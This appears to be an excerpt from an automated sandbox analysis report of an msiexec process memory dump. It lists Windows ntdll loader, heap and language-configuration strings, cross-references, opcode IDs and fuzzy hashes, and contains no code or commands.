                                                                        • @, xrefs: 220ED0FD
                                                                        • Control Panel\Desktop\LanguageConfiguration, xrefs: 220ED196
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.3185756422.00000000220C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 220C0000, based on PE: true
                                                                        • Associated: 0000000A.00000002.3185756422.00000000221E9000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000000A.00000002.3185756422.00000000221ED000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000000A.00000002.3185756422.000000002225E000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_220c0000_msiexec.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: @$@$@$Control Panel\Desktop\LanguageConfiguration$Control Panel\Desktop\MuiCached\MachineLanguageConfiguration$Software\Policies\Microsoft\Control Panel\Desktop$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration
                                                                        • API String ID: 0-1356375266
                                                                        • Opcode ID: 4d600e8eb39ac9dc05a58cce7ddba06b010385957bf5cdb8c61ff52991080842
                                                                        • Instruction ID: 333ce6576f267980d411a35a28a62103dbab267662626e881259e563e438f41d
                                                                        • Opcode Fuzzy Hash: 4d600e8eb39ac9dc05a58cce7ddba06b010385957bf5cdb8c61ff52991080842
                                                                        • Instruction Fuzzy Hash: 09A178B19483459FD321CF20C590F9FB7E8FB98719F004A2EF69996240D778DA48DB92
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.3185756422.00000000220C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 220C0000, based on PE: true
                                                                        • Associated: 0000000A.00000002.3185756422.00000000221E9000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000000A.00000002.3185756422.00000000221ED000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000000A.00000002.3185756422.000000002225E000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_220c0000_msiexec.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
                                                                        • API String ID: 0-523794902
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.3185756422.00000000220C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 220C0000, based on PE: true
                                                                        • Associated: 0000000A.00000002.3185756422.00000000221E9000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000000A.00000002.3185756422.00000000221ED000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000000A.00000002.3185756422.000000002225E000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_220c0000_msiexec.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: API set$DLL %wZ was redirected to %wZ by %s$LdrpPreprocessDllName$LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx$SxS$minkernel\ntdll\ldrutil.c
                                                                        • API String ID: 0-122214566
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.3185756422.00000000220C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 220C0000, based on PE: true
                                                                        • Associated: 0000000A.00000002.3185756422.00000000221E9000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000000A.00000002.3185756422.00000000221ED000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000000A.00000002.3185756422.000000002225E000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_220c0000_msiexec.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                                        • API String ID: 0-792281065
                                                                        Strings
                                                                        • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 22162178
                                                                        • RtlGetAssemblyStorageRoot, xrefs: 22162160, 2216219A, 221621BA
                                                                        • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 2216219F
                                                                        • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 22162180
                                                                        • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 221621BF
                                                                        • SXS: %s() passed the empty activation context, xrefs: 22162165
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.3185756422.00000000220C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 220C0000, based on PE: true
                                                                        • Associated: 0000000A.00000002.3185756422.00000000221E9000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000000A.00000002.3185756422.00000000221ED000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000000A.00000002.3185756422.000000002225E000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_220c0000_msiexec.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                                        • API String ID: 0-861424205
                                                                        Strings
                                                                        • minkernel\ntdll\ldrinit.c, xrefs: 2212C6C3
                                                                        • Unable to build import redirection Table, Status = 0x%x, xrefs: 221681E5
                                                                        • Loading import redirection DLL: '%wZ', xrefs: 22168170
                                                                        • LdrpInitializeProcess, xrefs: 2212C6C4
                                                                        • LdrpInitializeImportRedirection, xrefs: 22168177, 221681EB
                                                                        • minkernel\ntdll\ldrredirect.c, xrefs: 22168181, 221681F5
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.3185756422.00000000220C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 220C0000, based on PE: true
                                                                        • Associated: 0000000A.00000002.3185756422.00000000221E9000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000000A.00000002.3185756422.00000000221ED000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000000A.00000002.3185756422.000000002225E000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_220c0000_msiexec.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                                        • API String ID: 0-475462383
                                                                        Strings
                                                                        • Kernel-MUI-Language-SKU, xrefs: 2211542B
                                                                        • Kernel-MUI-Number-Allowed, xrefs: 22115247
                                                                        • Kernel-MUI-Language-Disallowed, xrefs: 22115352
                                                                        • WindowsExcludedProcs, xrefs: 2211522A
                                                                        • Kernel-MUI-Language-Allowed, xrefs: 2211527B
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.3185756422.00000000220C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 220C0000, based on PE: true
                                                                        • Associated: 0000000A.00000002.3185756422.00000000221E9000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000000A.00000002.3185756422.00000000221ED000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000000A.00000002.3185756422.000000002225E000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_220c0000_msiexec.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                                        • API String ID: 0-258546922
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.3185756422.00000000220C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 220C0000, based on PE: true
                                                                        • Associated: 0000000A.00000002.3185756422.00000000221E9000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000000A.00000002.3185756422.00000000221ED000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000000A.00000002.3185756422.000000002225E000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_220c0000_msiexec.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: $$$$LdrShutdownProcess$Process 0x%p (%wZ) exiting$minkernel\ntdll\ldrinit.c
                                                                        • API String ID: 0-1975516107
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.3185756422.00000000220C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 220C0000, based on PE: true
                                                                        • Associated: 0000000A.00000002.3185756422.00000000221E9000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000000A.00000002.3185756422.00000000221ED000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000000A.00000002.3185756422.000000002225E000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_220c0000_msiexec.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlFreeHeap
                                                                        • API String ID: 0-3061284088
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.3185756422.00000000220C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 220C0000, based on PE: true
                                                                        • Associated: 0000000A.00000002.3185756422.00000000221E9000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000000A.00000002.3185756422.00000000221ED000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000000A.00000002.3185756422.000000002225E000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_220c0000_msiexec.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                                        • API String ID: 0-3178619729
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.3185756422.00000000220C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 220C0000, based on PE: true
                                                                        • Associated: 0000000A.00000002.3185756422.00000000221E9000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000000A.00000002.3185756422.00000000221ED000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000000A.00000002.3185756422.000000002225E000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_220c0000_msiexec.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: !(CheckedFlags & ~HEAP_CREATE_VALID_MASK)$@$HEAP: $HEAP[%wZ]:
                                                                        • API String ID: 0-3570731704
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.3185756422.00000000220C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 220C0000, based on PE: true
                                                                        • Associated: 0000000A.00000002.3185756422.00000000221E9000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000000A.00000002.3185756422.00000000221ED000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000000A.00000002.3185756422.000000002225E000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_220c0000_msiexec.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                                        • API String ID: 0-379654539
                                                                        Strings
                                                                        • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 221621D9, 221622B1
                                                                        • .Local, xrefs: 221228D8
                                                                        • SXS: %s() passed the empty activation context, xrefs: 221621DE
                                                                        • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 221622B6
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.3185756422.00000000220C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 220C0000, based on PE: true
                                                                        • Associated: 0000000A.00000002.3185756422.00000000221E9000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000000A.00000002.3185756422.00000000221ED000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000000A.00000002.3185756422.000000002225E000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_220c0000_msiexec.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                                        • API String ID: 0-1239276146
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.3185756422.00000000220C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 220C0000, based on PE: true
                                                                        • Associated: 0000000A.00000002.3185756422.00000000221E9000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000000A.00000002.3185756422.00000000221ED000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000000A.00000002.3185756422.000000002225E000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_220c0000_msiexec.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: HEAP: $HEAP[%wZ]: $ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)$`
                                                                        • API String ID: 0-2586055223
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.3185756422.00000000220C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 220C0000, based on PE: true
                                                                        • Associated: 0000000A.00000002.3185756422.00000000221E9000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000000A.00000002.3185756422.00000000221ED000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000000A.00000002.3185756422.000000002225E000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_220c0000_msiexec.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: This is located in the %s field of the heap header.$HEAP: $HEAP[%wZ]: $Heap %p - headers modified (%p is %lx instead of %lx)
                                                                        • API String ID: 0-336120773
                                                                        • Opcode ID: 9c02640065e4b34b019cb535b92ac012c8874d392eac1377c161aa2825d59413
                                                                        • Instruction ID: 0392575a5252ac1995ceedbfd014958051e95b3ffcc34317829fa0bf27788118
                                                                        • Opcode Fuzzy Hash: 9c02640065e4b34b019cb535b92ac012c8874d392eac1377c161aa2825d59413
                                                                        • Instruction Fuzzy Hash: B73110B9290310EFD700CB98C9A0F9AB7E8FF15364F210156F505CB2A1DA34EF80DA61
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.3185756422.00000000220C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 220C0000, based on PE: true
                                                                        • Associated: 0000000A.00000002.3185756422.00000000221E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.3185756422.00000000221ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.3185756422.000000002225E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_220c0000_msiexec.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: HEAP: $HEAP[%wZ]: $VirtualProtect Failed 0x%p %x$VirtualQuery Failed 0x%p %x
                                                                        • API String ID: 0-1391187441
                                                                        • Opcode ID: 744cfe828deb6f2b1b8b4dd5808ab18cb516fbe67b2f19bcc0fd67f58ce85686
                                                                        • Instruction ID: b5f5844a2c4b0daa51b1b2dc30ee3fbc2579a66be6992fedd003c25f8c47dfdc
                                                                        • Opcode Fuzzy Hash: 744cfe828deb6f2b1b8b4dd5808ab18cb516fbe67b2f19bcc0fd67f58ce85686
                                                                        • Instruction Fuzzy Hash: 5A31C036E40318AFD701CB44C884F9EB7F9EF45724F2040A2E919AB291DB70DA80DA60
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.3185756422.00000000220C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 220C0000, based on PE: true
                                                                        • Associated: 0000000A.00000002.3185756422.00000000221E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.3185756422.00000000221ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.3185756422.000000002225E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_220c0000_msiexec.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                        • API String ID: 0-4253913091
                                                                        • Opcode ID: 0e5793243f581000e6f3f7808f322e4e94d73b8d4ac9d48264f6da70935a1a68
                                                                        • Instruction ID: 1da90496609f6db39e976794e3e4428be70192d8579e951aca152d890a9153c1
                                                                        • Opcode Fuzzy Hash: 0e5793243f581000e6f3f7808f322e4e94d73b8d4ac9d48264f6da70935a1a68
                                                                        • Instruction Fuzzy Hash: 41F17A70A80705EFD715CF68C990FAAB7B5FF54304F1082A9E9659B392D734AB81CB90
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.3185756422.00000000220C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 220C0000, based on PE: true
                                                                        • Associated: 0000000A.00000002.3185756422.00000000221E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.3185756422.00000000221ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.3185756422.000000002225E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_220c0000_msiexec.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit$MUI
                                                                        • API String ID: 0-1145731471
                                                                        • Opcode ID: c97e271a931b07fec3bbb265a7032c3d5590d35d5b8594c82ca83e896e6091e6
                                                                        • Instruction ID: ad08141487e741f1c3abfef3c38a45c8815b28aa1e1f8781e06a741d5d0f10e9
                                                                        • Opcode Fuzzy Hash: c97e271a931b07fec3bbb265a7032c3d5590d35d5b8594c82ca83e896e6091e6
                                                                        • Instruction Fuzzy Hash: 8CB1AD31A847548FCB19CF69C980F9EB7B1BF88318F144669E961EB380DB74EA51CB50
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.3185756422.00000000220C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 220C0000, based on PE: true
                                                                        • Associated: 0000000A.00000002.3185756422.00000000221E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.3185756422.00000000221ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.3185756422.000000002225E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_220c0000_msiexec.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: @$DelegatedNtdll$\SystemRoot\system32\
                                                                        • API String ID: 0-2391371766
                                                                        • Opcode ID: 08b14dad35ab5d3f353099916582a8197a8e7e98bcb322aeefc3c0224211bcb4
                                                                        • Instruction ID: d1d9c0f9bc1a6e4d499e6131fab60e70c76faa9c6151ac4d4dd55856267257cf
                                                                        • Opcode Fuzzy Hash: 08b14dad35ab5d3f353099916582a8197a8e7e98bcb322aeefc3c0224211bcb4
                                                                        • Instruction Fuzzy Hash: AFB1ACB26C4385AFE311CF94C981F9BB7F8AB84714F010929FA50DB291D774EA44CB92
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.3185756422.00000000220C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 220C0000, based on PE: true
                                                                        • Associated: 0000000A.00000002.3185756422.00000000221E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.3185756422.00000000221ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.3185756422.000000002225E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_220c0000_msiexec.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: FilterFullPath$UseFilter$\??\
                                                                        • API String ID: 0-2779062949
                                                                        • Opcode ID: 528dc4cc950b316e14e9d99d0c4a5c0757d79e4be6d080a928f65961a07cf9b6
                                                                        • Instruction ID: cdbc89eeb75b43dcbe406152ce5c3d4dec49cab054f285a300eb2d8d1547824e
                                                                        • Opcode Fuzzy Hash: 528dc4cc950b316e14e9d99d0c4a5c0757d79e4be6d080a928f65961a07cf9b6
                                                                        • Instruction Fuzzy Hash: 47A14671D413299ADB219B64CD88FDAB7B8AB48714F1001EAEA0DA7210DB359F84CF60
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.3185756422.00000000220C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 220C0000, based on PE: true
                                                                        • Associated: 0000000A.00000002.3185756422.00000000221E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.3185756422.00000000221ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.3185756422.000000002225E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_220c0000_msiexec.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: @$LdrpResMapFile Enter$LdrpResMapFile Exit
                                                                        • API String ID: 0-318774311
                                                                        • Opcode ID: 3e3d4d28a1bbb07b91a650bb98737dd14bdeade79462fdf56c5054a0c3eb73f4
                                                                        • Instruction ID: 55d7d8f9d0a07fb471b993cca04aab6ba6db15bde587885a4eb6fa63699afc22
                                                                        • Opcode Fuzzy Hash: 3e3d4d28a1bbb07b91a650bb98737dd14bdeade79462fdf56c5054a0c3eb73f4
                                                                        • Instruction Fuzzy Hash: 97815B71689341AFE3158F14C980FAAB7E8EF85754F080A69FE909B390D774DA04CF62
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.3185756422.00000000220C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 220C0000, based on PE: true
                                                                        • Associated: 0000000A.00000002.3185756422.00000000221E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.3185756422.00000000221ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.3185756422.000000002225E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_220c0000_msiexec.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: %$&$@
                                                                        • API String ID: 0-1537733988
                                                                        • Opcode ID: 9a9cd5b3f6b5651a845be472c4439efc46645f722bee94e08c10d6257c26deca
                                                                        • Instruction ID: 2ff45f614e6ebe4e793c7219050cd0aed14adc9d4c4a29e7b134d847288cf6d0
                                                                        • Opcode Fuzzy Hash: 9a9cd5b3f6b5651a845be472c4439efc46645f722bee94e08c10d6257c26deca
                                                                        • Instruction Fuzzy Hash: ED71AD70588B559FC314CF29CA80E5BBBEABF94318F204A1DF5A947245C731DB05CB92
                                                                        Strings
                                                                        • TargetNtPath, xrefs: 221CB82F
                                                                        • \Registry\Machine\SYSTEM\CurrentControlSet\Control\International, xrefs: 221CB82A
                                                                        • GlobalizationUserSettings, xrefs: 221CB834
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.3185756422.00000000220C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 220C0000, based on PE: true
                                                                        • Associated: 0000000A.00000002.3185756422.00000000221E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.3185756422.00000000221ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.3185756422.000000002225E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_220c0000_msiexec.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: GlobalizationUserSettings$TargetNtPath$\Registry\Machine\SYSTEM\CurrentControlSet\Control\International
                                                                        • API String ID: 0-505981995
                                                                        • Opcode ID: 30b9d4132dd4c1426082972e2299cb1d51e6f2a836c8b0692cabac50c845d4d1
                                                                        • Instruction ID: 101a0964c787d60da6c19968d294b9b901ee97bafad78dd61fae88f6c05dca4d
                                                                        • Opcode Fuzzy Hash: 30b9d4132dd4c1426082972e2299cb1d51e6f2a836c8b0692cabac50c845d4d1
                                                                        • Instruction Fuzzy Hash: 33614F76981329AFDB659F54CC88FDAB7B8AB24714F0101E5AA08E7250D7349F84CF91
                                                                        Strings
                                                                        • HEAP[%wZ]: , xrefs: 2214E6A6
                                                                        • RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 2214E6C6
                                                                        • HEAP: , xrefs: 2214E6B3
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.3185756422.00000000220C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 220C0000, based on PE: true
                                                                        • Associated: 0000000A.00000002.3185756422.00000000221E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.3185756422.00000000221ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.3185756422.000000002225E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_220c0000_msiexec.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: HEAP: $HEAP[%wZ]: $RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)
                                                                        • API String ID: 0-1340214556
                                                                        • Opcode ID: c36229ad95703dc960d7fcd268e2b2d195583c17b169a9ec707ec7dc0734c7f0
                                                                        • Instruction ID: a1cc5f16f5b6d15cbd0f8be9fa17d9342aeecde1a1130b185c53042829bea46e
                                                                        • Opcode Fuzzy Hash: c36229ad95703dc960d7fcd268e2b2d195583c17b169a9ec707ec7dc0734c7f0
                                                                        • Instruction Fuzzy Hash: 53511835644784EFE312CB64CA98F9ABBF8FF05304F1401A5E5998B692DB74EB40DB50
                                                                        Strings
                                                                        • minkernel\ntdll\ldrinit.c, xrefs: 221682E8
                                                                        • Failed to reallocate the system dirs string !, xrefs: 221682D7
                                                                        • LdrpInitializePerUserWindowsDirectory, xrefs: 221682DE
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.3185756422.00000000220C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 220C0000, based on PE: true
                                                                        • Associated: 0000000A.00000002.3185756422.00000000221E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.3185756422.00000000221ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.3185756422.000000002225E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_220c0000_msiexec.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                        • API String ID: 0-1783798831
                                                                        • Opcode ID: 3a87eed6763f0e1237dde852d69db9a5b8a512296a4b7b720b902fcab9944f6f
